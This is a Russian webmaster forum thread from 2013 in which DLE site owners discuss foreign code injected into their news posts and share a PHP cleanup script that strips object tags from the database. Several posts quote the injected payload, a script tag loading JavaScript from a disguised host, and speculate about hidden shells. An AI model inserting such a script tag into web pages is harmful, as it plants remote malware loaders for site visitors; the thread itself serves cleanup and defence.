оявление постороннего кода в новостях DLE

<?php

if(isset($_GET['blank'])) die();

error_reporting(0);

set_time_limit(0);

function stripslashes_array($array) { 

	return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 

}

if(get_magic_quotes_gpc()) $_POST = stripslashes_array($_POST); 



session_start ();

define ( 'DATALIFEENGINE', true );

$member_id = FALSE;

$is_logged = FALSE;

define('ROOT_DIR', dirname( __FILE__ ));

define('ENGINE_DIR', ROOT_DIR.'/engine');



require_once ROOT_DIR.'/engine/init.php';

?>

<html>

<head>

	<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

	<title>Доктор DLE</title>

	<style type="text/css">

	body, td, th {

    color: #333;

    font-family: Arial;

    font-size: 14px;

	}

	</style>

</head>

<body>

<?php

if(isset($_POST['submit'])) {

    echo '<div id="result">';

    $posts = $db->query("SELECT `id`, `full_story`, `short_story`  FROM `".PREFIX."_post`");

    while($post = $db->get_row($posts)) {

	    $post['full_story'] = preg_replace('/(<object.*<\/object>)/Usi', '', $post['full_story']);

	    $post['short_story'] = preg_replace('/(<object.*<\/object>)/Usi', '', $post['short_story']);

	    $sql = 'UPDATE `'.PREFIX.'_post` SET `full_story`="'.mysql_escape_string($post['full_story']).'", `short_story`="'.mysql_escape_string($post['short_story']).'" WHERE `id`='.$post['id'];

		$db->query($sql);

    }

    echo 'Готово';

    echo '</div>';

}

?>

<form action="" method="post">

<input type="submit" name="submit" value="Начать" />

</form>



</body>

</html>

Вроде не учтены правила сайта, туда тоже это чудо прописывается...

Все пересмотрел, но шелл не обнаружил...

Кто нибудь нашел его?

Abrikosik, будет круто если ктото допилит

Gooodd, Вылазит следующее:

Parse error: syntax error, unexpected '*', expecting ',' or ')' in /var/www/.../ses.php on line 2

там может быть просто eval или php Инклуд, а после тача не найдете, ток если сравнивать хешсуммы)

На форуме ДЛЕ Целсофт пишет что можно попробовать выполнить перестроение публикаций для новостей, а статические страницы нужно чистить ручками.

Вот топик

Народ, как очистить то понятно. Вопрос в том, что за уязвимость массовая? Помогает ли последняя заплатка последняя (в файле /engine/classes/min/index.php) и патч 9.7 официальный (от января 2013)? Или это что-то новое?

Нет, заплатка эта точно не помогает! Ломают в другую дыру. Сегодня уже модификация появилась, вида:

<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>

Тоже, сколько не пытаюсь найти шелл в файлах двига - ничего не нахожу. :( И действительно, в шаблоне правил сайта внизу тоже эта гадость добавляется.

у меня такая модификация еще вчера была, все почистил вчера, сменил пароли, пока что все ок, наблюдаем за развитием событий )

Попробовать.. Хм, что это даст? Код удалится, или дыра закрывается? :)

---------- Добавлено 13.09.2013 в 08:05 ----------

Не... Вчера у меня снова webmaster-yandex появился вечерком. Тоже восстановил бэкап базы, все пароли (в очередной раз сменил), сегодня утром уже сидел webmaster-google. :)

/ru/forum/comment/12138030

коперну пост, как я решил проблему.

почистил КЭШ и обновил пароли и поставил заплатку с офф сайта.

пока спокойно все

---------- Добавлено 13.09.2013 в 10:30 ----------

<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>

аналогично, искал шелл, ничего не нашел...видимо где-то дыра хорошая.

Понять бы каким образом был получен доступ к базе....